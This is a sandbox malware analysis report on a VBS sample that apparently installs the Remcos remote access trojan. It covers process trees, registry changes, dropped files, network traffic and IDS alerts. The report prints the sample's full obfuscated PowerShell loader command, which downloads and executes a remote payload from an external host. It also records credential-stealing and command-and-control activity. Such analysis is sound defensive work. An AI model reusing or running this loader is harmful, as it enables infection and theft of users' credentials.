| File name: | 4500376739.vbs |
| Full analysis: | https://app.any.run/tasks/5b966ea8-3f29-46a9-bb0f-d832a323f193 |
| Verdict: | Malicious activity |
| Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. |
| Analysis date: | May 19, 2025, 12:04:37 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (346), with CRLF line terminators |
| MD5: | 89E378F3D98EA7E2923BA3BBE72365D8 |
| SHA1: | 91465D7A633CE29BA47D60C936CE8700B93341AB |
| SHA256: | 0F9F183E49C35B4126203D15992146683E43BB8EA9561B50A3CEFEF95422FA42 |
| SSDEEP: | 1536:HwwlG3j0KfNk+U2NkA7YNvbpEn7bTfqNkOjdGO+Qbw7mNMh:HqjDfNk+UekA7YNv9E7/qNkOJGODbwaO |
MALICIOUS
Script downloads file (POWERSHELL)
- powershell.exe (PID: 6972)
Executes malicious content triggered by hijacked COM objects (POWERSHELL)
- powershell.exe (PID: 6972)
REMCOS mutex has been found
- msiexec.exe (PID: 8120)
REMCOS has been detected (SURICATA)
- msiexec.exe (PID: 8120)
REMCOS has been detected
- msiexec.exe (PID: 8120)
Steals credentials from Web Browsers
- svchost.exe (PID: 4428)
SUSPICIOUS
Creates FileSystem object to access computer's file system (SCRIPT)
- wscript.exe (PID: 6028)
Gets or sets the security protocol (POWERSHELL)
- powershell.exe (PID: 6972)
- powershell.exe (PID: 7768)
Reads data from a binary Stream object (SCRIPT)
- wscript.exe (PID: 6028)
Base64-obfuscated command line is found
- wscript.exe (PID: 6028)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 6028)
Runs shell command (SCRIPT)
- wscript.exe (PID: 6028)
Uses sleep to delay execution (POWERSHELL)
- powershell.exe (PID: 6972)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 6972)
- powershell.exe (PID: 7768)
Creates an instance of the specified .NET type (POWERSHELL)
- powershell.exe (PID: 6972)
Retrieves command line args for running process (POWERSHELL)
- powershell.exe (PID: 6972)
- powershell.exe (PID: 7768)
Converts a specified value to a byte (POWERSHELL)
- powershell.exe (PID: 7768)
Contacting a server suspected of hosting an CnC
- msiexec.exe (PID: 8120)
Connects to unusual port
- msiexec.exe (PID: 8120)
INFO
Uses string split method (POWERSHELL)
- powershell.exe (PID: 6972)
- powershell.exe (PID: 7768)
Disables trace logs
- powershell.exe (PID: 6972)
Converts byte array into ASCII string (POWERSHELL)
- powershell.exe (PID: 6972)
- powershell.exe (PID: 7768)
Checks proxy server information
- powershell.exe (PID: 6972)
- msiexec.exe (PID: 8120)
Manual execution by a user
- powershell.exe (PID: 7768)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 7768)
Gets data length (POWERSHELL)
- powershell.exe (PID: 7768)
Reads the software policy settings
- slui.exe (PID: 7240)
- msiexec.exe (PID: 8120)
Reads security settings of Internet Explorer
- msiexec.exe (PID: 8120)
Creates files or folders in the user directory
- msiexec.exe (PID: 8120)
Executable content was dropped or overwritten
- msiexec.exe (PID: 8120)
The sample compiled with english language support
- msiexec.exe (PID: 8120)
Create files in a temporary directory
- svchost.exe (PID: 4428)
- svchost.exe (PID: 6712)
- svchost.exe (PID: 6872)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
143
Monitored processes
14
Malicious processes
4
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4428 | C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\admin\AppData\Local\Temp\wsrakhzufghidjgyzvngsw" | C:\Windows\SysWOW64\svchost.exe | msiexec.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Services Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5428 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5720 | C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\admin\AppData\Local\Temp\gmwllajotoznoxccqgazvbhuiu" | C:\Windows\SysWOW64\svchost.exe | — | msiexec.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Services Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6028 | "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\4500376739.vbs | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 6644 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6712 | C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\admin\AppData\Local\Temp\rojdlsuphwraqeqgzrvbgobdrjduc" | C:\Windows\SysWOW64\svchost.exe | — | msiexec.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Services Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6872 | C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\admin\AppData\Local\Temp\gmwllajotoznoxccqgazvbhuiu" | C:\Windows\SysWOW64\svchost.exe | — | msiexec.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Services Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6972 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;Get-History;$Metalraffinaderis=(Get-Command A:).CommandType;$Metalraffinaderis=[String]$Metalraffinaderis;$Ladhood='Stabejs';$Metalraffinaderis+=':';(n`i -p $Metalraffinaderis -n Analysearbejde -value { param ($Kioskejere);$Eddikebryggeren=4;do {$Forundersges+=$Kioskejere[$Eddikebryggeren];$Eddikebryggeren+=5} until(!$Kioskejere[$Eddikebryggeren])$Forundersges});(n`i -p $Metalraffinaderis -n Skndegstens -value {param ($Chromotropism126);.($Goodies) ($Chromotropism126)});ConvertTo-Html;$Formulary=Analysearbejde 'F.rhn ,etECa,lt Vir.,ushW';$Formulary+=Analysearbejde ' Mu.eSlbnb Sb cForsL LniiPhotEEva NTae,T';$Skovturenes=Analysearbejde 'HoveM ebroGubezQuaiiFelilSnorlS araPhot/';$Comourner=Analysearbejde 'SobeTMenilBry sMar 1Klas2';$Eddikebryggerenndsyltet='Civi[aporn dagE G,stMeda.SottSMetaeAggrrLeerVDelai RescUlaseReciPTottO Alli FednMaratLinjmExcaa inN.okyaDag GScraeDeltR ids] Ak :Over:Oml s Coue enc Sa,uCariROveriradiT.narY.dtyPSideR FurODybgT CatO StacFon oTeksLSn p=Unco$AfblCnrmeOCo.nmTel oSo.ou fasRQuernTrafERe lr';$Skovturenes+=Analysearbejde ' Fr 5Indb.Svin0Detu Sau.(Cop,W Spai LinnpatrdM nio etawSalvsmiss ,aeaNByggT Bid Kabi1Omga0Bi p.Demi0F rv;Juge nuWStoiiK.chn Kap6Cah,4Fab ; Afl k.axRom 6Rena4 ,ur; P r Tupr Fisv br.:Apte1Sp o3 .dp7Chol.Krim0 Ove)tern NabuGTonneSyttcOv rk Ph.oSke /Impe2 opn0ring1Nonv0miss0 S.a1Untr0Dron1 Unc DizeFLegeiDuverBog.eCivifLavao FrexPres/ Lam1Aand3bumb7Tele.tho 0';$Skatteprocenten=Analysearbejde 'TartUOutys AfleT.thRBr.g-Blaaa Sj ggas.e TronCheeT';$spoonism=Analysearbejde 'Sk lhPar tSofftV depVaids Lok:Stra/ ds/UncamrewiaBuprcFusikNedb-Belic,roao HomnKnipcExcooInfir Nasd Fac.infahAfstrValu/S ifSCap u ,amplandeHypnrou bv triNedrtBedaaInt.lSamviPasttRounyAlbu.Proch,onthMidmk';$switchgrass=Analysearbejde 'Oftt>';$Goodies=Analysearbejde 'SawdI DodE Ba.x';$Stallion='Unmarriageable';$Philotheist='\Rigsombuddene3.Jer';Skndegstens (Analysearbejde 'Opga$T,heg Dial S.rOAfs BCamoastamLFagr:JordfBjeroSpi.r ParnAsiaI klacDibsa O,otend,RDkm IXyliX Kiw=Inco$ BalECo nnTourvBort:PaanA p npIndupRhamD pyaAV nnT S.bAUni,+ sag$SammpSe thDeseIChl L dbrOForvTAr.eHSvinE RicIThersUncaT');Skndegstens (Analysearbejde 'Dip $GrumgI seLO seOInteb,ornAJul.lRegr: galC MacADokuTOlshS E tU I,dIB ggtO sa=Fabl$ PersScenP ArioAposOKoldNIa tIsl ss indmGaar.StjestogoP ncolBlusIFejlTUdf.( Emb$D atsW chwA.syiDataT SpicNervhSaalGpej,RRubrAAmalsKla.S Beg)');Skndegstens (Analysearbejde $Eddikebryggerenndsyltet);$spoonism=$Catsuit[0];$Chloridate=(Analysearbejde ' Por$ cqugKul lSlano naB Thaa SkolPo p:,jasapl gN ColSAdspEFortiFejls gyn=ZygaNVeriEBackW Hv -UdliOStraBBlafj ine OpkC VanT Re. SpecS Ta yApposGambTCenaeD ndMEnke.Ranu$CharfAnicOCounrFeofMSml uOutslMonoA CidrOrn.Y');Skndegstens ($Chloridate);Skndegstens (Analysearbejde 'Pres$Coz APananPhilsAfg etu,aiSelvsAbb .PredH krieEleka Be.dBarneW amr IntsBrem[Samm$TripSEx ukVi iaSak,t AlrtQueee rinpCommrVerto eolcMarkeT lbnPro tCaloeSnolnE.cl]thun= olb$PostSAnt kSumpo DisvOstrt,roluCivirob yeL vbnFriteceres');$Materiality=Analysearbejde 'KlasDInefo Ec wRunonudvilRe doMewea I edPav.FSp,oi,ammlg.lge';$Kendingsbogstavs=Analysearbejde 'Que $NedbASilanNesosLgnie Soci StosDi.n.Appl$ ,rsM ChoaOutwtRecoe unirKompiFlesa SnilC stiSkintSnftyEnev.JittIBylinM ecvPreeo Ra kSsl e Liv(Juli$.eurssk.ipShilorecooSvejnDeliiPseus orbmcoxp, Tra$UlvsCEscahdateiSa.enPr fcIndkhBabyoMil.n kumaM,hw)';$Chinchona=$Fornicatrix;Skndegstens (Analysearbejde 'P nt$Nonfg PrelUnguoTintbTrisaPoecLUnsc:IntrT hamIGerolrorssQuinyli vNAabesRichvU,amREkseGUntoe TiprIm l=udr (TubuTUndoes.arsEdittafsv-billppol,a DigT Forhpi k Tinu$TokrcArrihbortI A.kNSsonCKerah ru oSt,mnHoloASkov)');while (!$Tilsynsvrger) {Skndegstens (Analysearbejde ' In $ArtigMahdl R.moRu obSoddaUnwrlApp :non Y B,loL chr,ookuFr,tb Unda Lon=Yaud$ pe,R ranePuslcgul,o AlllP,rioCa.unEll iDunds risi Sk nHolbg') ;Skndegstens $Kendingsbogstavs;Skndegstens (Analysearbejde 'Sid,[ ,istSub H StirordnE.rafAAnalDmeliIPrivnSinaGSoci. Pu t utihRu lR vereFor.aMeriD ral]Send:E.li:Kri,S orLVegheInd ESverPMeta(Firt4arki0Koll0Disk0Phas)');Skndegstens (Analysearbejde 'samt$ Squg verlCaphoIndrb.ispAT icL K a: uelTEntrIDoctlJordsOrigYParan ubhsRediV,calRSus g CyrE Frpr U h=Samm(Pse TBrn e SteSSamhT Bu -arglP GlyAPl rT SteH ixo Spa$,onfcClothGutti IntNUndec Ta.h forONonanBacka Ro,)') ;Skndegstens (Analysearbejde 'Seng$ An gst glPensoYndiB UdgAK leL,dbl:S mrh,yndaf rfsChirtUndieOlymbThioE TilHSm,laMargN PaldBacklFruiiAr,cnCat,G Do 1Inde1Whol9B,ha=Forf$KlyvGRespl.ntooShelbSestaEsneLG,ng:VersMPo ee SamlTrakls oeEFrodMSidelMeloABogtnUnp DFronE ,roSSla.+Miso+ Gou%Ex m$ lacc SomALaurTKommSGoldU F.riKamgt.iff..othChepaOundeuovernGoggt') ;$spoonism=$Catsuit[$Hastebehandling119]}$Bombycina=403227;$Admiralskibets=30129;Skndegstens (Analysearbejde 'Hyst$PycnG Ulyl t lO A,tBContaKartlP,li:Flerg F yiP sifBrystOt asBlgft xceO M lffoo,F R sEK rst Lyd drom=Mded onsGG thEB,titSkul-UnprC BreoDat,NWarntindkeeas,n AboTMisa S ol$ Grac RaaHKrngi UlyNstr CUretHSp dOOu.tnFladA');Skndegstens (Analysearbejde 'Svm $MincgAp rl.ostoLivsbSultaZe,hl.aas:BrdrTPolerBrodiKha vDispi StoaCo.tlDa,piPu lzRusteEnt d B l2Grde N nr=,ogi Tit [InddS ,ony ellsAntitMilbeWidgmSte..InduCA bioGravnSandv MareTestr Hemtun r]In.r:Mo,n:S raFF abrbagloV.scmBdniB FriaM,sds BraeIns 6dr.g4SkynSStratConsr viri esenpimpg,one(Vell$SkorGzairi GenfFasctArjusMinitCokeoCochfMethfSandeBombtS rn)');Skndegstens (Analysearbejde 'Form$M,toGComplAfvaoDispb py.aKli L Ree: Dism ManaTrskAGuesLTilhRRedne UniT R,dTNedhEAntiT U shan lEBaryD fo.2Inva0 Scu6sort Tamb=S.na Forn[Lamis vonYLystsConntKa aERe,nmChir.TotrtwoodE,ndkxEsteT Dek.Ta lEretaNEnstC enO PseDSaudiRuniNTr,vg oti]Amba:Fo s:ChauANoneS.iatC Va.iChu iSwed. PargS ngeJitstSkads A,it.kolREnfeIU.gaNM mrg Rya( Ter$ eteTPriorSupeIFormV,udeiCheqaFnerlO eri ModZBjereUn,eD .yd2Ekse)');Skndegstens (Analysearbejde ' Kla$Collg Re,ls ahOStroBVaccaGazalSar.:ConsfprepL pkaiOrgak rniKSi iePe uR lkeNPrfoE TatSRig =Bevi$br,cM ingaCryaa.almL skrRSockE DefT AxotSkoleKo ptsuichHorte VanDMinu2Inte0Stol6 Tel.Bj.rSfoxtuContbDecosKrantGldeRInveiOutlnKa dGZarr(Trav$O erBEskaO oyumNatrBpleuyEquiCStreiGu dN fenaRegr,Pewe$Ko kADigedM rcmAdmiiApt rInc AskatLCentSMoleKGeori CraBD kuEa.buTSquaSOrp )');Skndegstens $Flikkernes;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7212 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
15 031
Read events
15 024
Write events
7
Delete events
0
Modification events
| (PID) Process: | (8120) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Rmc-EWF6LQ |
| Operation: | write | Name: | exepath |
Value: 824A6EAE6DA02B450D964582585E8ACA33E0B08C3D6E24A3BE90801D3D8E51BD38AE8E174E1A22E93DA63EE3DD468E26668B74FC9CC6ACF11C74DA991242F3B1 | |||
| (PID) Process: | (8120) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Rmc-EWF6LQ |
| Operation: | write | Name: | licence |
Value: 280EEA1D9A2144D92671B774022FACDF | |||
| (PID) Process: | (8120) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Rmc-EWF6LQ |
| Operation: | write | Name: | time |
Value: | |||
| (PID) Process: | (8120) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Rmc-EWF6LQ |
| Operation: | write | Name: | UID |
Value: 784760180 | |||
| (PID) Process: | (8120) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (8120) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (8120) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
Executable files
3
Suspicious files
7
Text files
6
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4428 | svchost.exe | C:\Users\admin\AppData\Local\Temp\bhv7944.tmp | — | |
MD5:— | SHA256:— | |||
| 6972 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_guz4qjsb.ijh.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6972 | powershell.exe | C:\Users\admin\AppData\Roaming\Rigsombuddene3.Jer | text | |
MD5:16BF1C07785A2D90C4F69999BF6C9E77 | SHA256:A2056845C83EED44031E59495DDB86CC12D6C847D385914E83728769DC446528 | |||
| 8120 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\TH7905.tmp | executable | |
MD5:0FCD0296CAEAD9343FCDAD3584F64A18 | SHA256:71DD98860F562A59C39BE6EE5A40B35F29FCA1B13BCF0828B55613DAD0A67760 | |||
| 8120 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\TH7927.tmp | executable | |
MD5:C2FF41EE5E0C9B1259F263ADC8A52363 | SHA256:3455CB53E4BD4BE7279D770ED6C45004FA5B10C0CED2B2F110BB1E5DC8CE972B | |||
| 4428 | svchost.exe | C:\Users\admin\AppData\Local\Temp\wsrakhzufghidjgyzvngsw | text | |
MD5:73AFEF57A57FF8285682E59AEBA8FE4A | SHA256:9081F636845E9A6B7D781F2F35A28B33B7FDF5373075B435C5B373119D0934A3 | |||
| 7768 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lylkkj24.k0b.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7768 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 6972 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:70BE6AE8DAF3D061EF303803DEAD93DC | SHA256:108BAC62CDCFA93F4238F293EA610B6BB617C69A075E5600B1940FE2EF3243FE | |||
| 8120 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | binary | |
MD5:E192462F281446B5D1500D474FBACC4B | SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
27
DNS requests
20
Threats
6
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 23.216.77.33:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
8120 | msiexec.exe | GET | 200 | 69.192.161.44:80 | http://x1.c.lencr.org/ | unknown | — | — | whitelisted |
8032 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
8120 | msiexec.exe | GET | 200 | 184.24.77.54:80 | http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgVUTXRP3GD61jDYQ3Ez90wEpQ%3D%3D | unknown | — | — | whitelisted |
8032 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
8120 | msiexec.exe | GET | 200 | 178.237.33.50:80 | http://geoplugin.net/json.gp | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 23.216.77.33:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6972 | powershell.exe | 195.29.178.20:443 | mack-concord.hr | Hrvatski Telekom d.d. | HR | unknown |
6544 | svchost.exe | 40.126.31.130:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
2104 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
mack-concord.hr |
| unknown |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
8120 | msiexec.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash |
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |
8120 | msiexec.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection |
8120 | msiexec.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash |
8120 | msiexec.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection |